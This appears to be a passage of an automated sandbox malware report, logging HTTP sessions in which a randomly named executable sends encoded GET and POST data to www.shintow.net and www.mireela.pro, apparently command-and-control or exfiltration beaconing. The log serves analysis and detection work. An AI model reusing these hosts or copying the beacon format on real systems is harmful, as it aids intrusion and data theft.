                                                                                  Data Ascii: 5RH=O4lQUcptNkK6u4L0l3iYfHRMFH8/h3mZ5gqepF9o2ZKdOdA/lWaLM8kiGlvGdORagArNpg5TukdRBwafBXz0JuuDtfmFkaukpa9VfH6i1WzkSK5bPKirPrHs9xqZgLd9zLBrZURZZOLNdWM/rAlQ3Qq4cYrv+SAOENFIQSQakLYrds08DF8sAaW5mdXGZGo6eqjsXLvNbtkVxb054KCxRl+3AKLJcw6XT4Q1iiqh74O+f46T2d26nvXCW2P+bbfsBL35DAEkvCP5wbgrJWlnfk4bEdrKapGUh3L6VJiZyloc/xPFSp23Un+SZwJWnVMz1KakauuSBmEkyFcoL7ixbP38pnJnLlof+6RHUoWP4j8iWKCoHZaTY7Ya2W3+xokHzAHv0XZVBZC9ti7Fdgjs+4IlmHk+/ZCXh/ZcPYkrDLgRHOuEUdrML3WWzpYG34+vM4VwEMrVKwaIJmDTwIIvCfGGrANNWICqyA4h+hRSyPLydAQV7tfZOGz18PeR1W80U8IEnOPfChTQbd+/isl5e+1k2lPzBvBKLQijKqfBhH2opEfk49fEAMXt8gTJ2Pzhi7xMJdeuEc45zKIR46KCdMlABzLB0pd39B5mpc7OutXl7voq0Ulia0ZhJrC3v8Fn+fYKLlrZifAla7OwqI94WhVTWiGfUdQQGEuc5PiE8qKXpuBsmr9ji0u1yEUgY95w99rCDsdKIbYOFKYNyPm2Liv5oWADke4zyC+B/79AmPrclAXLr5W8OZkKP2YGdAkRT0jKqlrGIessi4L38pTAfjMI02MYo+htEjYVXFSsp7BpBv6vDqIumlwjJtwWaBAVsqyh0A/gmdQFFnVY6mNPpJhAR6LwGGUEoO2xGp4WWThTy/409xKzSuaSJGluRdZO/VN6q6xF5bo6brAKB39yTHdlglNaeGV49lgZIXapS+4hYlOtvS/tSbU6nSUlbYtr+wgeVZz1w1FjgEggNUgx33x00rUehFGuGr4OhUSI2QomtUxp [TRUNCATED]
                                                                                  Nov 15, 2024 06:45:54.594305992 CET1619OUTData Raw: 33 2f 57 39 30 55 59 73 53 45 78 59 43 4c 52 65 36 50 77 54 68 6f 2f 68 31 4d 50 38 70 45 41 35 51 51 38 59 79 34 78 67 41 6f 44 44 63 35 37 42 31 61 49 4a 69 62 54 70 35 55 4e 72 76 79 6b 36 46 44 44 36 37 5a 4b 61 4b 67 4a 67 31 79 51 2f 4d 38
                                                                                  Data Ascii: 3/W90UYsSExYCLRe6PwTho/h1MP8pEA5QQ8Yy4xgAoDDc57B1aIJibTp5UNrvyk6FDD67ZKaKgJg1yQ/M8y7XmqG6luwpfidWxLqdYyBkca2wY+844p0kSvG5XlxcGLOA5wKgo6Kf+ZOUs2AwppnO6iFYItse1pixKQih0GYq9V+ntY2REelKptNaewORMrX4B6wgPVArWAO34MbHQHTX402AZYuzZsR7csZivMmrw/zDbJz7h0
                                                                                  Nov 15, 2024 06:45:55.517364979 CET401INHTTP/1.1 301 Moved Permanently
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Fri, 15 Nov 2024 05:45:55 GMT
                                                                                  Location: https://www.shintow.net/ow7i/
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.2249166172.217.18.11580172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:45:57.191088915 CET414OUTGET /ow7i/?5RH=D6NwXqVIZVbqudPYhFuxSgI6F25/rGDj7EaXwER037qfX6kPuWmDPuQzRSnaZsITlUOw5UFltg9ddxyQI16qNu+e65Ogv/e38YRCJEvp7GjjWNBSB6vuUL3Vo0qU&WrGp=yRUDttthc40H6jfP HTTP/1.1
                                                                                  Host: www.shintow.net
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Nov 15, 2024 06:45:58.073215008 CET552INHTTP/1.1 301 Moved Permanently
                                                                                  Content-Type: application/binary
                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                  Date: Fri, 15 Nov 2024 05:45:57 GMT
                                                                                  Location: https://www.shintow.net/ow7i/?5RH=D6NwXqVIZVbqudPYhFuxSgI6F25/rGDj7EaXwER037qfX6kPuWmDPuQzRSnaZsITlUOw5UFltg9ddxyQI16qNu+e65Ogv/e38YRCJEvp7GjjWNBSB6vuUL3Vo0qU&WrGp=yRUDttthc40H6jfP
                                                                                  Server: ESF
                                                                                  Content-Length: 0
                                                                                  X-XSS-Protection: 0
                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                  X-Content-Type-Options: nosniff
                                                                                  Connection: close


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.224916769.57.163.22780172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:03.379935026 CET2472OUTPOST /mdol/ HTTP/1.1
                                                                                  Host: www.mireela.pro
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mireela.pro
                                                                                  Referer: http://www.mireela.pro/mdol/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 2160
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 46 44 35 66 4f 4e 48 39 55 6f 47 50 76 76 51 37 36 64 54 7a 59 46 79 44 2b 71 73 35 67 68 30 38 58 4c 48 57 4f 30 38 50 32 6d 66 36 77 37 4b 6f 6e 49 49 52 2f 2f 32 79 37 68 65 61 66 66 47 43 43 6e 30 55 33 4a 4e 50 31 72 7a 65 54 2f 74 33 50 4f 76 73 70 78 31 6b 4d 33 2f 4f 6c 35 4e 45 32 34 36 78 35 52 57 34 66 4b 4e 76 36 63 47 71 78 47 36 44 45 56 6e 4f 65 46 56 6a 55 49 71 66 67 55 6e 47 54 34 31 79 33 34 46 39 47 5a 46 76 65 52 4d 72 37 67 59 4a 62 59 56 7a 37 59 44 7a 4a 30 56 4e 72 42 79 52 70 72 50 54 57 73 73 35 59 64 72 2b 52 33 6b 30 32 64 68 2f 73 58 39 75 7a 54 58 61 35 7a 32 36 43 79 6e 33 6f 6f 72 53 6b 41 31 4e 48 4c 54 73 67 72 7a 36 4a 63 56 6d 6d 6a 68 36 65 4d 46 5a 65 78 6b 75 76 6f 4b 57 53 55 64 64 2f 39 51 36 52 33 4b 4a 6a 36 35 6f 58 44 79 66 54 6f 4d 4e 57 34 58 4c 37 53 4a 61 64 74 76 5a 65 4c 39 4a 5a 4d 75 6d 45 45 5a 4c 51 78 2b 46 59 33 43 66 38 48 65 57 4e 6e 70 37 66 36 55 53 6b 42 61 46 6e 58 33 4a 72 76 49 6d 76 77 42 49 44 4a 44 63 51 69 30 4b 70 47 [TRUNCATED]
                                                                                  Data Ascii: 5RH=FD5fONH9UoGPvvQ76dTzYFyD+qs5gh08XLHWO08P2mf6w7KonIIR//2y7heaffGCCn0U3JNP1rzeT/t3POvspx1kM3/Ol5NE246x5RW4fKNv6cGqxG6DEVnOeFVjUIqfgUnGT41y34F9GZFveRMr7gYJbYVz7YDzJ0VNrByRprPTWss5Ydr+R3k02dh/sX9uzTXa5z26Cyn3oorSkA1NHLTsgrz6JcVmmjh6eMFZexkuvoKWSUdd/9Q6R3KJj65oXDyfToMNW4XL7SJadtvZeL9JZMumEEZLQx+FY3Cf8HeWNnp7f6USkBaFnX3JrvImvwBIDJDcQi0KpGKnqDSVMITHred0OrqlUfPlX9tVWKV3W6eA3m8rx8imL+q4TN7PDuFS3IOUeti5NM096CkvOSNWsbsuIaXbSqrf+01vlKj8DXkqoW4y7VPR7oicOmfh4XyxzB+Rm0zAwLhDGsvhkVGyaI6xONdsM4J304UxXqf5EtWKiddl/6E/2phE/BijUOQMctrcT8f+B4JEgq0oamPtF6kCDuKN/DdLj2WiVxF/r6QInxDquDuJ/Tv8nqPy0OpPQZY2dEnHxN/DQka5+Fj2MLRB7kARWCCYaogsljfk1J1dopweiDNf5ZXfc+/7tSJYGaLKuYFM6mfuTlkYCxJEb7TPHRg7+gkJ5XmPaGcRsYjTSFFlhhOLTyBZ0WMEUEAS9/1AlKeXt9Z0s6FxXernyDIu/f2ziN3gnaHJ+Q7BerfTU3aXi7jc2EQkmv4Fe6i0oBiQv3fXTAiKFp7yPIUUlVObpvRFrAa6hrHS2xEF6oxFVbAMuXrDd41zgZe4lnk1oMuIe0vN6bIaF5BXN5B9PQnBoBqroOAtjE4tjEd9D8o4G4ecEfb89Evkjc3/edAyX90YPJWB3yTG54oZOMBzm0enTqOiAB56fr4DKlMGBlLoNCCan4qFZmg80PcCBBviHDXuOhjmYSj3PrqUQqIOcB01RiNbaDrIvMVqk7VMMLaL [TRUNCATED]
                                                                                  Nov 15, 2024 06:46:03.384865046 CET155OUTData Raw: 55 4e 79 59 49 75 6b 72 38 2b 52 47 4f 57 35 31 69 55 68 2b 2f 38 43 35 75 43 41 38 72 6c 53 4a 6e 61 73 76 37 6a 50 5a 42 63 74 4d 58 62 79 51 32 48 39 37 33 35 50 49 59 6d 6e 39 45 45 4a 6a 73 46 52 62 30 67 37 63 48 57 45 69 36 55 38 4a 79 74
                                                                                  Data Ascii: UNyYIukr8+RGOW51iUh+/8C5uCA8rlSJnasv7jPZBctMXbyQ2H9735PIYmn9EEJjsFRb0g7cHWEi6U8JytS/lYP/zYoU+82DgN6KueL72eIGtBbXfICNfMYK2v6Tahoe69UYUA3KPmoCxml0biJbzomimE0
                                                                                  Nov 15, 2024 06:46:04.127661943 CET959INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:03 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 815
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  7192.168.2.224916869.57.163.22780172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:05.916166067 CET666OUTPOST /mdol/ HTTP/1.1
                                                                                  Host: www.mireela.pro
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mireela.pro
                                                                                  Referer: http://www.mireela.pro/mdol/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 200
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 46 44 35 66 4f 4e 48 39 55 6f 47 50 76 73 34 37 34 49 7a 7a 43 6c 79 44 39 71 73 35 70 42 31 33 58 4c 4c 34 4f 78 45 6c 32 56 2f 36 77 71 36 6f 6e 38 6f 52 34 2f 32 7a 76 78 65 42 51 2f 47 58 43 6e 30 75 33 4d 4e 50 31 6f 50 65 4a 64 56 33 59 62 62 76 32 78 31 78 4e 48 2f 50 6c 35 52 6e 32 34 32 68 35 52 2b 34 66 50 4e 76 39 66 75 71 7a 6b 69 44 55 31 6e 45 4c 56 56 34 55 49 6e 66 67 55 33 4f 54 34 68 79 32 4a 5a 39 47 4d 35 76 55 6d 77 72 79 41 59 79 54 34 55 6c 79 61 6d 6e 50 48 77 59 68 53 69 44 73 6f 50 45 66 74 55 38 53 65 72 67 58 46 55 6d 7a 62 6f 6f 36 30 78 71 72 41 3d 3d
                                                                                  Data Ascii: 5RH=FD5fONH9UoGPvs474IzzClyD9qs5pB13XLL4OxEl2V/6wq6on8oR4/2zvxeBQ/GXCn0u3MNP1oPeJdV3Ybbv2x1xNH/Pl5Rn242h5R+4fPNv9fuqzkiDU1nELVV4UInfgU3OT4hy2JZ9GM5vUmwryAYyT4UlyamnPHwYhSiDsoPEftU8SergXFUmzboo60xqrA==
                                                                                  Nov 15, 2024 06:46:06.590946913 CET959INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:06 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 815
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  8192.168.2.224916969.57.163.22780172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:08.645531893 CET2472OUTPOST /mdol/ HTTP/1.1
                                                                                  Host: www.mireela.pro
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                  Origin: http://www.mireela.pro
                                                                                  Referer: http://www.mireela.pro/mdol/
                                                                                  Connection: close
                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                  Content-Length: 3624
                                                                                  Cache-Control: no-cache
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Data Raw: 35 52 48 3d 46 44 35 66 4f 4e 48 39 55 6f 47 50 67 76 67 37 36 70 7a 7a 4f 56 79 63 68 61 73 35 67 68 30 2b 58 4c 48 34 4f 30 38 50 32 6e 54 36 77 35 43 6f 70 34 49 52 2b 2f 32 7a 34 68 65 61 66 66 47 4e 43 6b 49 45 33 4a 49 74 31 75 33 65 54 2b 74 33 50 4e 48 73 75 78 31 6b 4a 48 2f 4d 6c 35 51 6e 32 34 6d 6c 35 52 7a 6c 66 50 56 76 36 71 43 71 31 55 69 41 52 31 6e 45 4c 56 56 30 55 49 6e 6a 67 56 65 64 54 39 4e 63 33 2f 56 39 46 70 46 76 62 68 4d 6f 2b 51 59 4d 4d 49 56 74 37 59 2f 43 4a 30 56 57 72 42 32 2f 70 72 54 54 58 36 34 35 59 65 7a 39 56 6e 6b 33 37 39 68 2f 78 48 38 49 7a 54 57 46 35 7a 32 36 43 78 44 33 6f 34 72 53 6b 43 64 4f 4a 72 54 73 38 37 7a 33 48 38 4a 55 6d 6a 6c 59 65 4e 56 4a 65 43 49 75 73 75 57 57 57 6b 64 64 35 4e 51 34 52 33 4b 4f 71 61 35 4b 58 44 62 6f 54 73 51 64 57 34 58 4c 37 52 78 61 58 66 58 5a 63 62 39 4a 44 73 75 6c 64 55 5a 4d 51 33 6a 2f 59 7a 4b 66 38 47 57 57 4d 51 74 37 49 73 49 52 72 68 61 41 6a 58 33 50 38 66 49 33 76 32 6c 32 44 4b 6a 79 51 69 45 4b 70 44 [TRUNCATED]
                                                                                  Data Ascii: 5RH=FD5fONH9UoGPgvg76pzzOVychas5gh0+XLH4O08P2nT6w5Cop4IR+/2z4heaffGNCkIE3JIt1u3eT+t3PNHsux1kJH/Ml5Qn24ml5RzlfPVv6qCq1UiAR1nELVV0UInjgVedT9Nc3/V9FpFvbhMo+QYMMIVt7Y/CJ0VWrB2/prTTX645Yez9Vnk379h/xH8IzTWF5z26CxD3o4rSkCdOJrTs87z3H8JUmjlYeNVJeCIusuWWWkdd5NQ4R3KOqa5KXDboTsQdW4XL7RxaXfXZcb9JDsuldUZMQ3j/YzKf8GWWMQt7IsIRrhaAjX3P8fI3v2l2DKjyQiEKpD+npmmVM4TEh+dOKru5UfGGX9pFWJR3H7eAwlEs+si8O+qIet7DDuAF3JuUfYe5fdU9pBMgeiNRobsHTqX2Sq/H+xF/l478Cnkqp0Ax1lPI8oiGEGe44XyLzBenlF7AwKRDB5zhkVG1fI67HtRrM4Uw04IbXs75F8GKicdl26E/xphDxhiDUOEccsD2QMj+AbhEsJcofGPvH6kBNOK6/H5LjzuIVw9/rY4IlTnqijuFxzu8nqOJ0OlDQY0MdGDHxPXDSg25wlj7fbRN/kAyWCKIapMKlinkzoVdrdsejjNd05XfLu/jtSwtGYPFuZNM6XPublkbdRI2WbTORhgT+g0J5XaPaH0RsLbTYS5l+BOeXyB592Q0UEQo97FqlMuXsvx0lZh+YOrlkTIopv2fiN38nYnZ+hbBe6/TTS3lu7jfs0QzoP50e7OKoBW6uAHXTEmKFbjyO4UUlVOYpvRBrAXDhq2a2xEF76ZFVtsMl3rMVY0n3JeilnxcoICye3rN4OEaF5BQSZAPXAnAoBmloOADjE0tj2R9Bug4FaGcJvb86EvjtM3+edAiX5cIPMiB1CzG66wYBcB23EeLK6C9AB1ifp0DLXoGA3joMyCa5oqaRGgpr/YOBCbEHHLAPVvmZhb3NoyTZ6IPCx03RiwraALQvMNQk9BMMraL [TRUNCATED]
                                                                                  Nov 15, 2024 06:46:08.650830030 CET1619OUTData Raw: 43 52 79 66 6f 75 35 69 63 2f 54 47 50 71 56 31 69 46 77 2b 2b 73 6b 2b 63 71 41 39 62 6c 53 4e 6a 36 76 38 72 6a 4a 59 42 63 77 4d 58 62 65 51 32 66 78 37 32 45 43 49 63 69 6e 39 47 73 4a 69 63 46 57 63 45 67 68 62 48 57 43 69 36 49 56 4a 79 30
                                                                                  Data Ascii: CRyfou5ic/TGPqV1iFw++sk+cqA9blSNj6v8rjJYBcwMXbeQ2fx72ECIcin9GsJicFWcEghbHWCi6IVJy0e/lIP/y0oVes2UQN6COeO1WeBIN9cXfhBWKI6fRzGWbMeZ4Nsc11fUczPNA2O4taSN1EAyxZ5K990wJXNJi0g7n+Ct2COwNvsx0ZtjwkiUcoPW2jkdT+P7bBgyH++WhthrVG61W7S5Jutb2jyYX4U/RGIhWjkR0Wk
                                                                                  Nov 15, 2024 06:46:09.585263968 CET959INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:09 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 815
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>
                                                                                  Nov 15, 2024 06:46:09.585522890 CET959INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:09 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 815
                                                                                  Connection: close
                                                                                  Content-Type: text/html
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 50 6f 70 70 69 6e 73 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 [TRUNCATED]
                                                                                  Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Poppins:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>404</h1></div><h2>Oops, The Page you are looking for can't be found!</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button">Search</button></form><a href="/"><span class="arrow"></span>Go Back</a></div></div></body></html>


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  9192.168.2.224917069.57.163.22780172C:\Program Files (x86)\zIpOAEXuBjWYDyHFxrlRaeYZlUhCYwSqtVnzGZvcsOpkG\CuJYYyjxRgkNEt.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  Nov 15, 2024 06:46:11.191468000 CET414OUTGET /mdol/?5RH=IBR/N437Xoj/lvQ897DSFCGd1oR1jSFvQ9XvO2IN6lbwsaKUqIYS/t7V4RHRPO7VGkMU2dFR1OPoWNJQfvLnpgskAhvCg85lkqmyzGqwbfp9zK6j91HWEALvJgsG&WrGp=yRUDttthc40H6jfP HTTP/1.1
                                                                                  Host: www.mireela.pro
                                                                                  Accept: */*
                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                  Connection: close
                                                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0; ASUS_Z00AD Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                  Nov 15, 2024 06:46:11.869606972 CET974INHTTP/1.1 404 Not Found
                                                                                  Date: Fri, 15 Nov 2024 05:46:11 GMT
                                                                                  Server: Apache
                                                                                  Content-Length: 815
                                                                                  Connection: close
